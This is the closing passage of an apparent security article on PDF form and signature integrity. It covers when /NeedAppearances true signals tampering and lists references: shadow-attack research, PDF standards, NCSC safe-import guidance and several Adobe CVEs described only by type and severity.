Programmatic form-fill workflows that update /V but defer /AP regeneration legitimately produce /NeedAppearances true documents — including mail-merge pipelines, PDF form-fill libraries, and e-signature platforms (DocuSign-generated PDFs have been observed to carry /NeedAppearances true; observed behavior, not vendor-documented) that prioritise speed over appearance-stream completeness. On its own, /NeedAppearances true is a medium-severity finding. The critical signal is /NeedAppearances true combined with a digital signature, which is rarely produced by legitimate tooling. Running qpdf --generate-appearances before signing eliminates the condition by rebuilding all AP streams from current /V values.

Research References

  1. C. Mainka, V. Mladenov, S. Rohlmann, J. Schwenk. “Shadow Attacks: Hiding and Replacing Content in Signed PDFs.” Proceedings of the Network and Distributed System Security Symposium (NDSS) 2021 and extended presentation at ACM CCS 2021. Disclosed to 28 vendors; resulted in patches from Adobe, Foxit, LibreOffice, and others.
    ndss-symposium.org
  2. J. Müller, V. Mladenov, J. Somorovsky, J. Schwenk. “PDF Insecurity” series (2017–2019). Systematic study of signature-validation weaknesses across viewers and libraries. Introduced the Universal Signature Forgery and incremental-save attack classifications.
    pdf-insecurity.org
  3. ISO 32000-2:2020. Document management — Portable Document Format — Part 2: PDF 2.0. International Organization for Standardization, Geneva, Switzerland. §12.8.2.2 (DocMDP), §12.7.3 (AcroForm), §12.7.4 (Field types and /V semantics), §12.7.8 (XFA forms — deprecated in PDF 2.0).
  4. ETSI EN 319 132-1 V1.2.1 (2019). Electronic Signatures and Infrastructures (ESI) — XAdES digital signatures — Part 1: Building blocks and XAdES baseline signatures. European Telecommunications Standards Institute. The PAdES equivalent, ETSI EN 319 102-1, defines the DSS/LTV addition workflow that ISO 32000-2 §12.8.2.2 NOTE 2 permits under DocMDP P=1.
    ETSI EN 319 102-1 (PDF)
  5. MITRE ATT&CK T1566.001 — Phishing: Spearphishing Attachment. Documents the operational use of malicious file attachments, including PDF-delivered payloads, as an initial-access technique. Relevant to the threat-spectrum context in this article: the majority of malicious PDFs observed in the wild are spearphishing attachments that do not rely on AcroForm field manipulation.
    attack.mitre.org/techniques/T1566/001
  6. UK National Cyber Security Centre. “Pattern: Safe Import.” NCSC Guidance. Describes the content-disarm-and-reconstruct (CDR) approach to untrusted document import: strip active content, rebuild the file from validated structure. The multi-layer sanitization philosophy in this article (strip, flatten, rasterise as ordered trust levels) maps directly to this pattern.
    ncsc.gov.uk/guidance/pattern-safe-import
  7. D. Stevens. PDF malware analysis tools and research. Didier Stevens has published practical PDF malware analysis resources including pdfid.py and pdf-parser.py — widely used to enumerate PDF objects, detect JavaScript, identify OpenAction and embedded file streams, and triage suspicious PDFs without rendering.
    blog.didierstevens.com/programs/pdf-tools
  8. CVE-2021-28550. Adobe Acrobat and Reader use-after-free (APSB21-29, May 2021). Exploitable via malformed AcroForm structure; remote code execution. CVSS 8.8.
  9. CVE-2021-21017. Adobe Acrobat heap-based buffer overflow in XFA engine (APSB21-09, February 2021). Remote code execution. CVSS 8.8.
  10. CVE-2024-45112. Adobe Acrobat XFA/AcroForm type confusion (APSB24-70, September 2024). Remote code execution; exploitable via a PDF containing both XFA and AcroForm structures. CVSS 8.6.
  11. CVE-2023-21608. Adobe Acrobat use-after-free (APSB23-01, January 2023). Remote code execution via crafted PDF. CVSS 7.8.


© 2026 PQ PDF — All rights reserved.
